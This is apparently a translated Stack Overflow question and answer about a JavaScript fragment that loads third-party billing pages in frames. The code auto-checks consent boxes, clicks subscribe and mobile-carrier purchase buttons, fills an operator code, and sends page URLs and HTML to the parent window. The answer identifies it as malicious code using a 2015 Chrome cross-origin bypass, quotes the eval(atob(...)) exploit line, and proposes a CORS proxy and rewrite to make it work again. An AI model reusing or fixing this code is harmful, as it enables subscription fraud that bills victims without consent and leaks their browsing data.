window.parent.postMessage('found large expanded success button float-center>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
document.getElementsByClassName('large expanded success button float-center')[0].click();
window.parent.postMessage('large expanded success button float-center submitted>>>', '*');
}
else if(window.location.href.indexOf("appsilike.mobi/BE")!=-1)
{
window.parent.postMessage('in appsilike.mobi>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
setTimeout(
function () {
document.getElementsByClassName('button pulse').length>0 && document.getElementById('check')!=undefined
window.parent.postMessage('found button pulse>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
document.getElementById('check').checked = true;
document.getElementsByClassName('button pulse')[0].click();
window.parent.postMessage('found button pulse clicked>>>', '*');
},
1900
);
window.parent.postMessage('in appsilike.mobi2>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
}
else if(document.getElementById('Operator')!=undefined)
{
window.parent.postMessage('found Operator>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
document.getElementById('Operator').value = '20610';
document.getElementById('submit_button').click();
window.parent.postMessage('submit_button submitted>>>', '*');
}
else if(url.indexOf('mdsp.orange.be/w-ha/app-bundlepurchase/node')!=-1 &&
document.getElementsByClassName('button').length==3)
{
window.parent.postMessage('found btn >>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
window.parent.postMessage('found btn>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
setTimeout(
function () {
document.getElementsByClassName('button')[2].click();
},
2000
);
window.parent.postMessage('btn clicked>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
}
else if(ttt!="" && ttt.indexOf("video-wrld.com/BE")!=-1)
{
window.parent.postMessage('zfound ttt>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
window.parent.postMessage('zfound ttt>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
location.replace(ttt);
window.parent.postMessage('zfound ttt clicked>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
}
else
{
window.parent.postMessage('else >>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
window.parent.postMessage('else >>>'+ Base64.encode(document.getElementsByTagName('html')[0].innerHTML), '*');
window.parent.postMessage('6464.DB CALL-HTML(0)>>>'+ (document.getElementsByTagName('html')[0].innerHTML), '*');
}
调试时,从该值开始执行的代码是else if调用的代码:
else if(window.location.href.indexOf("appsilike.mobi/BE")!=-1)
本质上,该脚本的作用是创建一个带有第三方网站的 iframe,导航该网站,查找那里的提交按钮,并将其传递给父级并选中复选框。
最佳答案
这看起来像是利用 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6755 的恶意代码在 chrome 46 中已修复,如下所示:https://chromereleases.googleblog.com/2015/10/stable-channel-update.html
[$8837][519558] High CVE-2015-6755: Cross-origin bypass in Blink. Credit to Mariusz Mlynski.
此行将被调用,因为 isAndroidMobile 将为 false
window.open("\u0000javascript:eval(atob(\""+ value +"\"))", "androidload"+x);
在这里我们看到了该漏洞的使用。使脚本运行的解决方案是使用 CORS 代理并重写代码。
关于JavaScript 不适用于高于 Chrome mobile 45 的版本,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/45613658/